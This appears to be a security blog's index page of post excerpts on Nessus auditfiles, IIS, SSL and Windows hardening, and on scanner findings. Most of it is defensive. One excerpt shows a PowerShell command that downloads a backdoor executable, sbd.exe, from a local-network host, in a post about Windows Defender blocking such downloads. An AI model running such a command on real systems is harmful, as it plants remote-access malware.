Objective Changes to the permissions on files could block security settings from being applied. Changes to the permissions on files could leak sensitive information. Changes to the permissions on files could lead to a system compromise. Audit files. Manual audit with powershell View the permission on the application log file with powershell get-acl "C:\Windows\SYSTEM32\WINEVT\LOGS\application.evtx" | fl […]
Read More »
Objective: Resolved the error “PASSWORD_COMPLEXITY_UNSUPPORTED_ON_AGENT” when running a Windows auditfile via a Nessus Agent.
Read More »
Nessus Output: Description The remote host is missing one or more of the following Microsoft updates: KB2871997, KB2973351, KB2975625, KB2982378, KB2984972, KB2984976, KB2984981, KB2973501, or KB3126593. These updates are needed to improve the protection against possible credential theft. - For Windows 7 / 2008 R2 : KB2984972, KB2871997, KB2982378, and KB2973351 are required; also, KB2984976 […]
Read More »
Objective Monitor Windows Services with Nessus via auditfile
Read More »
Objective: Audit “Advanced Audit Policy Configuration Settings” Hardening / Configuring “Advanced Audit Policy Configuration Settings”
Read More »
Objective: Audit “User Rights Assignment” Hardening / Configuring “User Rights Assignment”
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Nessus Output: Description The remote service accepts connections encrypted using SSL 2.0 and/or SSL 3.0. These versions of SSL are affected by several cryptographic flaws. An attacker can exploit these flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected service and clients. NIST has determined that SSL 3.0 is no longer acceptable […]
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Nessus Output: Description The remote host supports SSLv2 and therefore may be affected by a vulnerability that allows a cross-protocol Bleichenbacher padding oracle attack known as DROWN (Decrypting RSA with Obsolete and Weakened eNcryption). This vulnerability exists due to a flaw in the Secure Sockets Layer Version 2 (SSLv2) implementation, and it allows captured TLS […]
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Nessus Output: Description The remote host allows SSL/TLS connections with one or more Diffie-Hellman moduli less than or equal to 1024 bits. Through cryptanalysis, a third party may be able to find the shared secret in a short amount of time (depending on modulus size and attacker resources). This may allow an attacker to recover […]
Read More »
Nessus Output Description The remote Windows host supports Server Message Block (SMB) Protocol version 1. It is, therefore, affected by an unspecified remote code execution vulnerability that allows an unauthenticated, remote attacker to execute arbitrary code. Note that this vulnerability is one of multiple Equation Group vulnerabilities and exploits disclosed by a group known as […]
Read More »
Objective Target your Nessus Auditfile checks to a specific OU or DC
Read More »
Objective Resolve this finding
Read More »
Objective Resolve this finding
Read More »
Objective Resolve this finding
Read More »
Objective Use only strong SSL Cipher Suites Resolve ‘SSL 64-bit Block Size Cipher Suites Supported (SWEET32)’ Resolve ‘SSL RC4 Cipher Suites Supported (Bar Mitzvah)‘
Read More »
Objective Perform a credentialed scan without errors
Read More »
Objective Monitor file integrity by generating a hash and verify it with Nessus
Read More »
Objective Monitor file integrity by generating a hash and verify it with Nessus
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Best practice for systems running IIS, part of Hardening IIS:
Read More »
Objective Target your Nessus Auditfile checks to a specific version of IIS.
Read More »
Objective Identify and remediate failed scans in Nessus / Security Center.
Read More »
Often, during a penetration test on web applications, we come up against many error codes generated from applications or web servers. It’s possible to cause these errors to be displayed by using a particular requests, either specially crafted with tools or created manually. These codes are very useful to penetration testers during their activities, because […]
Read More »
Nikto Output DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment and when performing the Fingerprint Web Server (Passive) and Fingerprint Web Server (Active) Tests.
Read More »
Nikto Output The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
Read More »
Nikto Output The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
Read More »
Nikto output The site uses SSL and the Strict-Transport-Security HTTP header is not defined
Read More »
Objective Group Policy Objects contain sensitive configuration information which can be viewed by default by at least all members of the Domain. Misconfigurations of Group Policy settings or its content can have a huge impact on the environment. A periodic audit is advised.
Read More »
Account Policies are settings related to The Password Policy The Account Lockout Policy
Read More »
Objective Changes to the permissions on group policy registry keys could block security settings from being applied. Audit these registry keys (and subkeys).
Read More »
Nessus Output Synopsis : The remote device supports LLMNR. Description : The remote device answered to a Link-local Multicast Name Resolution (LLMNR) request. This protocol provides a name lookup service similar to NetBIOS or DNS. It is enabled by default on modern Windows versions. Reported Risk factor by Nessus: None In my option the severity should […]
Read More »
Objective Resolve error
Read More »
Steps to harden Google Chrome: Updating Google Chrome Review best practices Configure Group Policy settings
Read More »
Objective Verify the HTTP Response headers of your Web Site/Apps.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Netsparker will report this issue during your scanning phase.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.
Read More »
Nessus Output Description Some daemon processes on the remote host are associated with programs that have been installed manually. System administration best practice dictates that an operating system’s native package management tools be used to manage software installation, updates, and removal whenever possible.
Read More »
Nessus Output Description The remote SSH server is configured to allow either MD5 or 96-bit MAC algorithms, both of which are considered weak. Note that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.
Read More »
Nessus Output Description The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. Note that this plugin only checks for the options of the SSH server and does not check for vulnerable software versions.
Read More »
Tools … that can be used to perform SMB enumeration.
Read More »
Resources used for auditing and hardening of Netapp devices:
Read More »
Description A virtualization manager is a virtualization environment management application that provides capabilities to create, edit, remove and monitor virtual machines. A virtualization manager provides a complete management solution for many different virtual machines simultaneously through a single application management console. A virtualization manager is also known as a virtual machine manager, a virtual machine […]
Read More »
Description VMware vRealize Suite is a software product suite designed to enable IT professionals to create and manage hybrid clouds. The vRealize Suite bundles existing management software, including IT Business Management Suite, vCloud Automation Center (vCAC), vCenter Operations Management Suite and vCenter LogInsight.
Read More »
Objective I couldn’t find a script editor that recognizes the Nessus .audit file keywords and syntax so I’m working on a user defined language definition file for Notepad++.
Read More »
You can use ‘if then else’ logic in your Nessus auditfile to: target your checks to specific applications, versions, roles/features, environments. check conditions that are required to run the check, for example the availability of commands, file/directory, service/daemon, open port, running executable, installed package etc. minimize the number of auditfiles by implementing condition blocks
Read More »
Starter templates for Nessus auditfile….
Read More »
Objective Resolve the error condition “POWERSHELL_NO_RESULT: powershell command returned no result” in the Nessus auditfile for Windows.
Read More »
Objective Resolve the error “POWERSHELL_REG_FAILURE: Could not determine powershell location in the registry” when running a compliance scan on Windows
Read More »
Objective Nessus has many plugins but it is not checking all applications that are installed. So we want to be able to create a simple version check with a Nessus auditfile for Windows applications.
Read More »
Objective Read a .nessus file (hosts properties, vulnerability and compliance scan results) into excel.
Read More »
Nessus Scanning a Cisco ACS with credentials (ssh) is currently not fully supported:
Read More »
Nessus You can use Nessus to detect VMware Tools: Microsoft Windows Installed Software Enumeration (credentialed check) (20811) SNMP Query Installed Software Disclosure (19763) There are currently no version checking / vulnerability plugins. A manual vulnerability assessment is required.
Read More »
Nessus Output KB 3000483 or a related, subsequent update was successfully installed, but the GPO setting "Hardened UNC Paths" has not been enabled.
Read More »
Nessus Output Nessus determined the workaround is not being used because the following registry value does not exist : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Windows\Sidebar\TurnOffSidebar
Read More »
Nessus Description The registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount is non-null. It means that the remote host locally caches the passwords of the users when they log in, in order to continue to allow the users to log in in the case of the failure of the PDC.
Read More »
Nessus Output The workaround to disable SSL 3.0 for all server software installed on the remote host has not been applied. The workaround to disable SSL 3.0 for all client software installed on the remote host has not been applied.
Read More »
Nessus Output The following registry values have not been set to 1 : HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\SchUseStrongCrypto HKLM\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\SchUseStrongCrypto
Read More »
Nessus Output ASLR hardening settings for Internet Explorer in KB3125869 have not been applied. The following DWORD keys must be created with a value of 1: - HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_USER32_EXCEPTION_HANDLER_HARDENING\iexplore.exe - HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_USER32_EXCEPTION_HANDLER_HARDENING\iexplore.exe
Read More »
Nessus Plugin Output The remote host contains one or more unsupported versions of the Microsoft XML Parser (MSXML) or XML Core Services. Downloading and Installing Microsoft Core XML Services (MSXML) 6.0 does not fix this issue.
Read More »
Nessus Output ntdll.dll has been upgraded by KB2264107 or a related, subsequent update, but the following registry entry has not been set : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CWDIllegalInDllSearch
Read More »
References Nessus Cloud Documentation Nessus Cloud Login Portal
Read More »
References for developing Nessus auditfiles: Tenable Audit Policies – Apple Mac OS X Apple Mac OS X CIS Benchmarks
Read More »
References: Tenable Security Center Release Notes Tenable Security Center Product Page Tenable Security Center API Tenable Support Portal Tenable Discussion Forum Tenable Security Advisories Vulnerabilities: CVE Details
Read More »
References: Nessus Release Notes Nessus Support Portal Nessus Product Page Nessus Plugins Tenable Discussion Forum Tenable Security Advisories Vulnerabilities: CVE Details
Read More »
References used to develop Nessus Auditfiles for Cisco Devices:
Read More »
References used to develop Nessus Auditfiles for Splunk:
Read More »
References used to develop Nessus Auditfiles for Tibco Products:
Read More »
Objective: According to Microsoft announcement: Support for older versions of Internet Explorer ended on January 12th, 2016, you should verify you Windows systems to the latest Microsoft Support Lifecycle statements.
Read More »
References used to develop Nessus Auditfiles for Oracle: Nessus sample auditfiles on Tenable Support Portal Tenable discussion forum CIS Benchmarks
Read More »
References used to develop Nessus Auditfiles for Oracle:
Read More »
Objective Use file integrity checking tools to ensure that critical system files (including sensitive system and application executables, libraries, and configurations) have not been altered. Critical Security Control #3: Secure Configurations for Hardware and Software – System 3.5 SFC and Powershell Windows contains a build-in utility called sfc to verify and fix Windows File Integrity […]
Read More »
Best practices and references used for hardening MS SQL
Read More »
STIGs: CIS Benchmarks
Read More »
STIGs: DNS Policy BIND DNS STIG Windows DNS CIS Benchmarks Nessus: Nessus Plugins for DNS
Read More »
STIGS: Active Directory Domain Security Technical Implementation Guide (STIG) Active Directory Forest Security Technical Implementation Guide (STIG) Active Directory Service 2008 Security Technical Implementation Guide (STIG) Active Directory Service 2003 Security Technical Implementation Guide (STIG) Windows Server 2012 / 2012 R2 Domain Controller Security Technical Implementation Guide Windows Server 2012 Domain Controller Security Technical Implementation […]
Read More »
A quick example to query a xml config file to retrieve a specific security setting Powershell: Select-Xml -path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config -XPath "/configuration/system.web/membership/providers/add" | Select-Object -ExpandProperty node | Select-Object passwordFormat passwordFormat -------------- HashedSelect-Xml -path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config -XPath "/configuration/system.web/membership/providers/add" | Select-Object -ExpandProperty node | Select-Object passwordFormat passwordFormat -------------- Hashed
Read More »
When we try to download a backdoor program Windows Defender will block the file. Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"
Read More »
A few code snippets to perform ping sweeps:
Read More »
Best practices and references used for hardening IIS.
Read More »
Links: Security Guidance for Critical Areas of Focus in Cloud Computing : Cloud Security Alliance Cloud Computing Risk Assessment — ENISA NIST Cloud Computing 6 Security Reference Architecture Whitepaper Cloudcomputing | NCSC Cloud Controls Matrix : Cloud Security Alliance
Read More »
Security Configuration Guides: CIS Benchmark – not available STIG – not available SCAP – not available Secure Messaging Scenarios with WebSphere MQ WebSphere MQ Security in an Enterprise Environment Known vulnerabilities: CVE Details Available Exploits: Exploit-DB
Read More »
Security Configuration Guides: CIS Benchmarks STIG – not available SCAP NIST – not available Apache Tomcat 7 – Security Considerations Apache Tomcat 8 – Security Considerations Apache Tomcat 9 – Security Considerations Vulnerabilities: Apache Tomcat Security Updates CVE Details Vulners Exploits: Available Exploits: Exploit-DB
Read More »
Security Configuration Guides: CIS Benchmarks STIG SCAP NIST Apache HTTP Server 2.4 Security Tips Apache Hardening on securityweekly Apache HTTP Server Security Report Known vulnerabilities: CVE Details Available Exploits: Exploit-DB
Read More »
Security Configuration Guides: CIS Benchmark –not available STIG –not available SCAP – not available Redbook IBM Websphere Application Server v.7.0 Security Guide Redbook IBM Websphere Application Server v.8.0 Administration and Configuration Guide Redbook IBM Websphere Application Server v.8.5 Administration and Configuration Guide Websphere Application Server bevat IBM HTTP Server die zijn oorsprong vind in Apache HTTP […]
Read More »
Best practices and references used for hardening JBoss.
Read More »
STIGs are Security Technical Installation Guides. I use the STIGS together with the product documentation to create and review security baselines and development of Nessus Audit files. STIGs can be downloaded here: http://www.stigviewer.com
Read More »
The SANS Critical Security Controls can be used to prioritize your security policies.
Read More »
The CIS Security Benchmarks provide a good starting point for hardening your servers and applications. The latest CIS Security Benchmarks can be downloaded here. You can browse the available security Benchmarks here
Read More »
Verify the flash version in your browser here
Read More »
References used to harden and audit Vmware
Read More »
References used to develop Nessus Auditfiles for Windows :
Read More »
Resources used for creating custom Nessus Auditfile for Red Hat Enterprise:
Read More »
I’m working on a custom Linux auditfile with Oracle checks. I want this audit file to be generic, so no hardcoded instance names in the auditfile.
Read More »
Issue The default Nessus\CIS auditfiles for MS SQL are split up in OS level and Database level auditfiles. This results in at-least 2 auditfile per instance which you have to schedule in 2 jobs. This is not a scalable solution.
Read More »
